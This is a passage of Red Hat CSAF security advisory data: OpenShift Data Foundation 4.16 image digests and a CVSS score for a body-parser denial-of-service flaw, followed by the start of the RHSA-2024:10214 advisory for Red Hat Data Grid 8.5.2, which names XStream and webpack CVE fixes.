"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2024_10214
Vulnerability from csaf_redhat
Published
2024-11-25 16:56
Modified
2024-12-17 18:59
Summary
Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update
Notes
Topic
An update for Red Hat Data Grid 8 is now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.
Data Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].
Security Fix(es):
* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)
* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for Red Hat Data Grid 8 is now available.\n \nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].\n\nSecurity Fix(es):\n\n* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)\n\n* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:10214", url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index", url: "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2324606", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2324606", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10214.json", }, ], title: "Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update", tracking: { current_release_date: "2024-12-17T18:59:59+00:00", generator: { date: 